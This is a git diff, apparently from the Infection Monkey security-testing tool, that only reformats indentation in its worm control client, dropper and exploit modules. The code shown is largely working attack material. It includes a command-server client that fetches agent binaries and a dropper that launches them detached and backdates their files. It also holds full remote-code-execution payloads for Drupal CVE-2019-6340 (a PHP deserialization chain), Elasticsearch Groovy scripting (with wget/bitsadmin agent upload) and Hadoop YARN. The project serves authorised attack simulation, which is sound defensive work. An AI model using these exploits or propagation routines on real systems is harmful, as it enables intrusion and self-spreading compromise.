has_internet_access = check_internet_access(WormConfiguration.internet_services)
monkey = {
- "guid": GUID,
- "hostname": hostname,
- "ip_addresses": local_ips(),
- "description": " ".join(platform.uname()),
- "internet_access": has_internet_access,
- "config": WormConfiguration.as_dict(),
- "parent": parent,
+ "guid": GUID,
+ "hostname": hostname,
+ "ip_addresses": local_ips(),
+ "description": " ".join(platform.uname()),
+ "internet_access": has_internet_access,
+ "config": WormConfiguration.as_dict(),
+ "parent": parent,
}
if ControlClient.proxies:
monkey["tunnel"] = ControlClient.proxies.get("https")
requests.post(
- "https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
- data=json.dumps(monkey),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=20,
+ "https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
+ data=json.dumps(monkey),
+ headers={"content-type": "application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=20,
)
@staticmethod
def find_server(default_tunnel=None):
LOG.debug(
- "Trying to wake up with Monkey Island servers list: %r"
- % WormConfiguration.command_servers
+ "Trying to wake up with Monkey Island servers list: %r"
+ % WormConfiguration.command_servers
)
if default_tunnel:
LOG.debug("default_tunnel: %s" % (default_tunnel,))
@@ -93,10 +93,10 @@ class ControlClient(object):
debug_message += " through proxies: %s" % ControlClient.proxies
LOG.debug(debug_message)
requests.get(
- f"https://{server}/api?action=is-up", # noqa: DUO123
- verify=False,
- proxies=ControlClient.proxies,
- timeout=TIMEOUT_IN_SECONDS,
+ f"https://{server}/api?action=is-up", # noqa: DUO123
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=TIMEOUT_IN_SECONDS,
)
WormConfiguration.current_server = current_server
break
@@ -131,17 +131,18 @@ class ControlClient(object):
if ControlClient.proxies:
monkey["tunnel"] = ControlClient.proxies.get("https")
requests.patch(
- "https://%s/api/monkey/%s"
- % (WormConfiguration.current_server, GUID), # noqa: DUO123
- data=json.dumps(monkey),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/%s"
+ % (WormConfiguration.current_server, GUID), # noqa: DUO123
+ data=json.dumps(monkey),
+ headers={"content-type": "application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
return {}
@@ -149,23 +150,25 @@ class ControlClient(object):
def send_telemetry(telem_category, json_data: str):
if not WormConfiguration.current_server:
LOG.error(
- "Trying to send %s telemetry before current server is established, aborting."
- % telem_category
+ "Trying to send %s telemetry before current server is established, aborting."
+ % telem_category
)
return
try:
- telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
+ telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
requests.post(
- "https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
- data=json.dumps(telemetry),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/telemetry"
+ % (WormConfiguration.current_server,),  # noqa: DUO123
+ data=json.dumps(telemetry),
+ headers={"content-type": "application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
@staticmethod
@@ -173,18 +176,19 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return
try:
- telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
+ telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
requests.post(
- "https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
- data=json.dumps(telemetry),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
+ data=json.dumps(telemetry),
+ headers={"content-type": "application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
@staticmethod
@@ -193,32 +197,33 @@ class ControlClient(object):
return
try:
reply = requests.get(
- "https://%s/api/monkey/%s"
- % (WormConfiguration.current_server, GUID), # noqa: DUO123
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/%s"
+ % (WormConfiguration.current_server, GUID), # noqa: DUO123
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
return
try:
unknown_variables = WormConfiguration.from_kv(reply.json().get("config"))
LOG.info(
- "New configuration was loaded from server: %r"
- % (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)
+ "New configuration was loaded from server: %r"
+ % (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)
)
except Exception as exc:
# we don't continue with default conf here because it might be dangerous
LOG.error(
- "Error parsing JSON reply from control server %s (%s): %s",
- WormConfiguration.current_server,
- reply._content,
- exc,
+ "Error parsing JSON reply from control server %s (%s): %s",
+ WormConfiguration.current_server,
+ reply._content,
+ exc,
)
raise Exception("Couldn't load from from server's configuration, aborting. %s" % exc)
@@ -231,17 +236,18 @@ class ControlClient(object):
return
try:
requests.patch(
- "https://%s/api/monkey/%s"
- % (WormConfiguration.current_server, GUID), # noqa: DUO123
- data=json.dumps({"config_error": True}),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/%s"
+ % (WormConfiguration.current_server, GUID), # noqa: DUO123
+ data=json.dumps({"config_error":True}),
+ headers={"content-type":"application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
return {}
@@ -260,7 +266,7 @@ class ControlClient(object):
@staticmethod
def download_monkey_exe_by_os(is_windows, is_32bit):
filename, size = ControlClient.get_monkey_exe_filename_and_size_by_host_dict(
- ControlClient.spoof_host_os_info(is_windows, is_32bit)
+ ControlClient.spoof_host_os_info(is_windows, is_32bit)
)
if filename is None:
return None
@@ -281,7 +287,7 @@ class ControlClient(object):
else:
arch = "x86_64"
- return {"os": {"type": os, "machine": arch}}
+ return {"os":{"type":os, "machine":arch}}
@staticmethod
def download_monkey_exe_by_filename(filename, size):
@@ -293,11 +299,11 @@ class ControlClient(object):
return dest_file
else:
download = requests.get(
- "https://%s/api/monkey/download/%s"
- % (WormConfiguration.current_server, filename), # noqa: DUO123
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/download/%s"
+ % (WormConfiguration.current_server, filename), # noqa: DUO123
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
with monkeyfs.open(dest_file, "wb") as file_obj:
@@ -310,7 +316,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
@staticmethod
@@ -323,13 +330,13 @@ class ControlClient(object):
return None, None
try:
reply = requests.post(
- "https://%s/api/monkey/download"
- % (WormConfiguration.current_server,), # noqa: DUO123
- data=json.dumps(host_dict),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=LONG_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/download"
+ % (WormConfiguration.current_server,), # noqa: DUO123
+ data=json.dumps(host_dict),
+ headers={"content-type":"application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=LONG_REQUEST_TIMEOUT,
)
if 200 == reply.status_code:
result_json = reply.json()
@@ -343,7 +350,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
return None, None
@@ -371,10 +379,11 @@ class ControlClient(object):
def get_pba_file(filename):
try:
return requests.get(
- PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123
- verify=False,
- proxies=ControlClient.proxies,
- timeout=LONG_REQUEST_TIMEOUT,
+ PBA_FILE_DOWNLOAD
+ % (WormConfiguration.current_server, filename),  # noqa: DUO123
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=LONG_REQUEST_TIMEOUT,
)
except requests.exceptions.RequestException:
return False
@@ -383,14 +392,14 @@ class ControlClient(object):
def get_T1216_pba_file():
try:
return requests.get(
- urljoin(
- f"https://{WormConfiguration.current_server}/", # noqa: DUO123
- T1216_PBA_FILE_DOWNLOAD_PATH,
- ),
- verify=False,
- proxies=ControlClient.proxies,
- stream=True,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ urljoin(
+ f"https://{WormConfiguration.current_server}/", # noqa: DUO123
+ T1216_PBA_FILE_DOWNLOAD_PATH,
+ ),
+ verify=False,
+ proxies=ControlClient.proxies,
+ stream=True,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except requests.exceptions.RequestException:
return False
@@ -398,21 +407,24 @@ class ControlClient(object):
@staticmethod
def should_monkey_run(vulnerable_port: str) -> bool:
if (
- vulnerable_port
- and WormConfiguration.get_hop_distance_to_island() > 1
- and ControlClient.can_island_see_port(vulnerable_port)
- and WormConfiguration.started_on_island
+ vulnerable_port
+ and WormConfiguration.get_hop_distance_to_island() > 1
+ and ControlClient.can_island_see_port(vulnerable_port)
+ and WormConfiguration.started_on_island
):
raise PlannedShutdownException(
- "Monkey shouldn't run on current machine "
- "(it will be exploited later with more depth)."
+ "Monkey shouldn't run on current machine "
+ "(it will be exploited later with more depth)."
)
return True
@staticmethod
def can_island_see_port(port):
try:
- url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
+ url = (
+ f"https://{WormConfiguration.current_server}/api/monkey_control"
+ f"/check_remote_port/{port}"
+ )
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
response = json.loads(response.content.decode())
return response["status"] == "port_visible"
@@ -422,8 +434,8 @@ class ControlClient(object):
@staticmethod
def report_start_on_island():
requests.post(
- f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
- data=json.dumps({"started_on_island": True}),
- verify=False,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
+ data=json.dumps({"started_on_island":True}),
+ verify=False,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py
index 74c20321b..fdb649cad 100644
--- a/monkey/infection_monkey/dropper.py
+++ b/monkey/infection_monkey/dropper.py
@@ -53,8 +53,8 @@ class MonkeyDrops(object):
self.opts, _ = arg_parser.parse_known_args(args)
self._config = {
- "source_path": os.path.abspath(sys.argv[0]),
- "destination_path": self.opts.location,
+ "source_path":os.path.abspath(sys.argv[0]),
+ "destination_path":self.opts.location,
}
def initialize(self):
@@ -80,18 +80,18 @@ class MonkeyDrops(object):
shutil.move(self._config["source_path"], self._config["destination_path"])
LOG.info(
- "Moved source file '%s' into '%s'",
- self._config["source_path"],
- self._config["destination_path"],
+ "Moved source file '%s' into '%s'",
+ self._config["source_path"],
+ self._config["destination_path"],
)
file_moved = True
except (WindowsError, IOError, OSError) as exc:
LOG.debug(
- "Error moving source file '%s' into '%s': %s",
- self._config["source_path"],
- self._config["destination_path"],
- exc,
+ "Error moving source file '%s' into '%s': %s",
+ self._config["source_path"],
+ self._config["destination_path"],
+ exc,
)
# if file still need to change path, copy it
@@ -100,16 +100,16 @@ class MonkeyDrops(object):
shutil.copy(self._config["source_path"], self._config["destination_path"])
LOG.info(
- "Copied source file '%s' into '%s'",
- self._config["source_path"],
- self._config["destination_path"],
+ "Copied source file '%s' into '%s'",
+ self._config["source_path"],
+ self._config["destination_path"],
)
except (WindowsError, IOError, OSError) as exc:
LOG.error(
- "Error copying source file '%s' into '%s': %s",
- self._config["source_path"],
- self._config["destination_path"],
- exc,
+ "Error copying source file '%s' into '%s': %s",
+ self._config["source_path"],
+ self._config["destination_path"],
+ exc,
)
return False
@@ -117,7 +117,7 @@ class MonkeyDrops(object):
if WormConfiguration.dropper_set_date:
if sys.platform == "win32":
dropper_date_reference_path = os.path.expandvars(
- WormConfiguration.dropper_date_reference_path_windows
+ WormConfiguration.dropper_date_reference_path_windows
)
else:
dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
@@ -125,58 +125,59 @@ class MonkeyDrops(object):
ref_stat = os.stat(dropper_date_reference_path)
except OSError:
LOG.warning(
- "Cannot set reference date using '%s', file not found",
- dropper_date_reference_path,
+ "Cannot set reference date using '%s', file not found",
+ dropper_date_reference_path,
)
else:
try:
os.utime(
- self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime)
+ self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime)
)
except OSError:
LOG.warning("Cannot set reference date to destination file")
monkey_options = build_monkey_commandline_explicitly(
- parent=self.opts.parent,
- tunnel=self.opts.tunnel,
- server=self.opts.server,
- depth=self.opts.depth,
- location=None,
- vulnerable_port=self.opts.vulnerable_port,
+ parent=self.opts.parent,
+ tunnel=self.opts.tunnel,
+ server=self.opts.server,
+ depth=self.opts.depth,
+ location=None,
+ vulnerable_port=self.opts.vulnerable_port,
)
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = (
- MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
- + monkey_options
+ MONKEY_CMDLINE_WINDOWS % {"monkey_path":self._config["destination_path"]}
+ + monkey_options
)
else:
dest_path = self._config["destination_path"]
- # In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
+ # In linux we have a more complex commandline. There's a general outer one,
+ # and the inner one which actually
# runs the monkey
inner_monkey_cmdline = (
- MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
- + monkey_options
+ MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]}
+ + monkey_options
)
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
- "monkey_directory": dest_path[0 : dest_path.rfind("/")],
- "monkey_commandline": inner_monkey_cmdline,
+ "monkey_directory":dest_path[0: dest_path.rfind("/")],
+ "monkey_commandline":inner_monkey_cmdline,
}
monkey_process = subprocess.Popen(
- monkey_cmdline,
- shell=True,
- stdin=subprocess.PIPE,
- stdout=subprocess.PIPE,
- stderr=subprocess.PIPE,
- close_fds=True,
- creationflags=DETACHED_PROCESS,
+ monkey_cmdline,
+ shell=True,
+ stdin=subprocess.PIPE,
+ stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE,
+ close_fds=True,
+ creationflags=DETACHED_PROCESS,
)
LOG.info(
- "Executed monkey process (PID=%d) with command line: %s",
- monkey_process.pid,
- monkey_cmdline,
+ "Executed monkey process (PID=%d) with command line: %s",
+ monkey_process.pid,
+ monkey_cmdline,
)
time.sleep(3)
@@ -188,9 +189,10 @@ class MonkeyDrops(object):
try:
if (
- (self._config["source_path"].lower() != self._config["destination_path"].lower())
- and os.path.exists(self._config["source_path"])
- and WormConfiguration.dropper_try_move_first
+ (self._config["source_path"].lower() != self._config[
+ "destination_path"].lower())
+ and os.path.exists(self._config["source_path"])
+ and WormConfiguration.dropper_try_move_first
):
# try removing the file first
@@ -198,23 +200,24 @@ class MonkeyDrops(object):
os.remove(self._config["source_path"])
except Exception as exc:
LOG.debug(
- "Error removing source file '%s': %s", self._config["source_path"], exc
+ "Error removing source file '%s': %s", self._config["source_path"], exc
)
# mark the file for removal on next boot
dropper_source_path_ctypes = c_char_p(self._config["source_path"])
if 0 == ctypes.windll.kernel32.MoveFileExA(
- dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
+ dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
):
LOG.debug(
- "Error marking source file '%s' for deletion on next boot (error %d)",
- self._config["source_path"],
- ctypes.windll.kernel32.GetLastError(),
+ "Error marking source file '%s' for deletion on next boot (error "
+ "%d)",
+ self._config["source_path"],
+ ctypes.windll.kernel32.GetLastError(),
)
else:
LOG.debug(
- "Dropper source file '%s' is marked for deletion on next boot",
- self._config["source_path"],
+ "Dropper source file '%s' is marked for deletion on next boot",
+ self._config["source_path"],
)
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
diff --git a/monkey/infection_monkey/exploit/HostExploiter.py b/monkey/infection_monkey/exploit/HostExploiter.py
index e5bdf6dfe..857137c7c 100644
--- a/monkey/infection_monkey/exploit/HostExploiter.py
+++ b/monkey/infection_monkey/exploit/HostExploiter.py
@@ -10,7 +10,6 @@ from infection_monkey.utils.plugins.plugin import Plugin
__author__ = "itamar"
-
logger = logging.getLogger(__name__)
@@ -37,7 +36,8 @@ class HostExploiter(Plugin):
EXPLOIT_TYPE = ExploitType.VULNERABILITY
# Determines if successful exploitation should stop further exploit attempts on that machine.
- # Generally, should be True for RCE type exploiters and False if we don't expect the exploiter to run the monkey agent.
+ # Generally, should be True for RCE type exploiters and False if we don't expect the
+ # exploiter to run the monkey agent.
# Example: Zerologon steals credentials
RUNS_AGENT_ON_SUCCESS = True
@@ -49,12 +49,12 @@ class HostExploiter(Plugin):
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {
- "display_name": self._EXPLOITED_SERVICE,
- "started": "",
- "finished": "",
- "vulnerable_urls": [],
- "vulnerable_ports": [],
- "executed_cmds": [],
+ "display_name":self._EXPLOITED_SERVICE,
+ "started":"",
+ "finished":"",
+ "vulnerable_urls":[],
+ "vulnerable_ports":[],
+ "executed_cmds":[],
}
self.exploit_attempts = []
self.host = host
@@ -75,14 +75,14 @@ class HostExploiter(Plugin):
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
self.exploit_attempts.append(
- {
- "result": result,
- "user": user,
- "password": password,
- "lm_hash": lm_hash,
- "ntlm_hash": ntlm_hash,
- "ssh_key": ssh_key,
- }
+ {
+ "result":result,
+ "user":user,
+ "password":password,
+ "lm_hash":lm_hash,
+ "ntlm_hash":ntlm_hash,
+ "ssh_key":ssh_key,
+ }
)
def exploit_host(self):
@@ -120,4 +120,4 @@ class HostExploiter(Plugin):
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
- self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})
+ self.exploit_info["executed_cmds"].append({"cmd":cmd, "powershell":powershell})
diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py
index efbbc2f56..aaeba8f1c 100644
--- a/monkey/infection_monkey/exploit/drupal.py
+++ b/monkey/infection_monkey/exploit/drupal.py
@@ -1,7 +1,8 @@
"""
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
- https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
+ https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
+ /f9f6a5bb6605745e292bee3a4079f261d891738a.
"""
import logging
@@ -28,7 +29,8 @@ class DrupalExploiter(WebRCE):
def get_exploit_config(self):
"""
- We override this function because the exploits requires a special extension in the URL, "node",
+ We override this function because the exploits requires a special extension in the URL,
+ "node",
e.g. an exploited URL would be http://172.1.2.3:/node/3.
:return: the Drupal exploit config
"""
@@ -42,7 +44,8 @@ class DrupalExploiter(WebRCE):
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
"""
- We need a specific implementation of this function in order to add the URLs *with the node IDs*.
+ We need a specific implementation of this function in order to add the URLs *with the
+ node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
@@ -58,7 +61,7 @@ class DrupalExploiter(WebRCE):
node_url = urljoin(url, str(node_id))
if self.check_if_exploitable(node_url):
self.add_vuln_url(
- url
+ url
) # This is for report. Should be refactored in the future
self.vulnerable_urls.append(node_url)
if stop_checking:
@@ -71,7 +74,8 @@ class DrupalExploiter(WebRCE):
def check_if_exploitable(self, url):
"""
Check if a certain URL is exploitable.
- We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
+ We use this specific implementation (and not simply run self.exploit) because this
+ function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
@@ -79,11 +83,11 @@ class DrupalExploiter(WebRCE):
payload = build_exploitability_check_payload(url)
response = requests.get(
- f"{url}?_format=hal_json", # noqa: DUO123
- json=payload,
- headers={"Content-Type": "application/hal+json"},
- verify=False,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ f"{url}?_format=hal_json", # noqa: DUO123
+ json=payload,
+ headers={"Content-Type":"application/hal+json"},
+ verify=False,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
if is_response_cached(response):
@@ -99,11 +103,11 @@ class DrupalExploiter(WebRCE):
payload = build_cmd_execution_payload(base, cmd)
r = requests.get(
- f"{url}?_format=hal_json", # noqa: DUO123
- json=payload,
- headers={"Content-Type": "application/hal+json"},
- verify=False,
- timeout=LONG_REQUEST_TIMEOUT,
+ f"{url}?_format=hal_json", # noqa: DUO123
+ json=payload,
+ headers={"Content-Type":"application/hal+json"},
+ verify=False,
+ timeout=LONG_REQUEST_TIMEOUT,
)
if is_response_cached(r):
@@ -117,7 +121,8 @@ class DrupalExploiter(WebRCE):
def get_target_url(self):
"""
- We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
+ We're overriding this method such that every time self.exploit is invoked, we use a fresh
+ vulnerable URL.
Reusing the same URL eliminates its exploitability because of caching reasons :)
:return: vulnerable URL to exploit
"""
@@ -128,14 +133,16 @@ class DrupalExploiter(WebRCE):
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
:return: Whether the list of vulnerable URLs has at least 5 elements.
"""
- # We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey, chmod it and run it.
+ # We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
+ # chmod it and run it.
num_urls_needed_for_full_exploit = 5
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
LOG.info(
- f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
- f"but only {num_available_urls} found"
+ f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
+ f"Drupal server "
+ f"but only {num_available_urls} found"
)
return result
@@ -151,7 +158,7 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
while lower < upper:
node_url = urljoin(base_url, str(lower))
response = requests.get(
- node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
+ node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
) # noqa: DUO123
if response.status_code == 200:
if is_response_cached(response):
@@ -164,30 +171,30 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url):
payload = {
- "_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
- "type": {"target_id": "article"},
- "title": {"value": "My Article"},
- "body": {"value": ""},
+ "_links":{"type":{"href":f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
+ "type":{"target_id":"article"},
+ "title":{"value":"My Article"},
+ "body":{"value":""},
}
return payload
def build_cmd_execution_payload(base, cmd):
payload = {
- "link": [
+ "link":[
{
- "value": "link",
- "options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
- 'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
- 'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
- '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
- 's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
- 'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
- 'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
- 'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
- "".replace("|size|", str(len(cmd))).replace("|command|", cmd),
+ "value":"link",
+ "options":'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
+ 'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
+ 'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
+ '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
+ 's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
+ 'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
+ 'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
+ 'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
+ "".replace("|size|", str(len(cmd))).replace("|command|", cmd),
}
],
- "_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
+ "_links":{"type":{"href":f"{urljoin(base, '/rest/type/shortcut/default')}"}},
}
return payload
diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py
index ca1c0408b..aff5e1ffd 100644
--- a/monkey/infection_monkey/exploit/elasticgroovy.py
+++ b/monkey/infection_monkey/exploit/elasticgroovy.py
@@ -1,6 +1,7 @@
"""
Implementation is based on elastic search groovy exploit by metasploit
- https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+ https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
+ /modules/exploits/multi/elasticsearch/search_groovy_script.rb
Max vulnerable elasticsearch version is "1.4.2"
"""
@@ -33,11 +34,12 @@ class ElasticGroovyExploiter(WebRCE):
# attack URLs
MONKEY_RESULT_FIELD = "monkey_result"
GENERIC_QUERY = (
- """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
+ """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
)
JAVA_CMD = (
- GENERIC_QUERY
- % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
+ GENERIC_QUERY
+ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(
+ \\"%s\\").getText()"""
)
_TARGET_OS_TYPE = ["linux", "windows"]
@@ -51,13 +53,14 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config["dropper"] = True
exploit_config["url_extensions"] = ["_search?pretty"]
exploit_config["upload_commands"] = {
- "linux": WGET_HTTP_UPLOAD,
- "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
+ "linux":WGET_HTTP_UPLOAD,
+ "windows":CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
}
return exploit_config
def get_open_service_ports(self, port_list, names):
- # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
+ # We must append elastic port we get from elastic fingerprint module because It's not
+ # marked as 'http' service
valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
if ES_SERVICE in self.host.services:
valid_ports.append([ES_PORT, False])
@@ -70,7 +73,8 @@ class ElasticGroovyExploiter(WebRCE):
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error(
- "Elastic couldn't upload monkey, because server didn't respond to upload request."
+ "Elastic couldn't upload monkey, because server didn't respond to upload "
+ "request."
)
return False
result = self.get_results(response)
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index d92c39f6c..02ec81652 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -1,6 +1,7 @@
"""
Remote code execution on HADOOP server with YARN and default settings
- Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
+ Implementation is based on code from
+ https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import json
@@ -63,25 +64,27 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
- posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
+ posixpath.join(url, "ws/v1/cluster/apps/new-application"),
+ timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
# Create a random name for our application in YARN
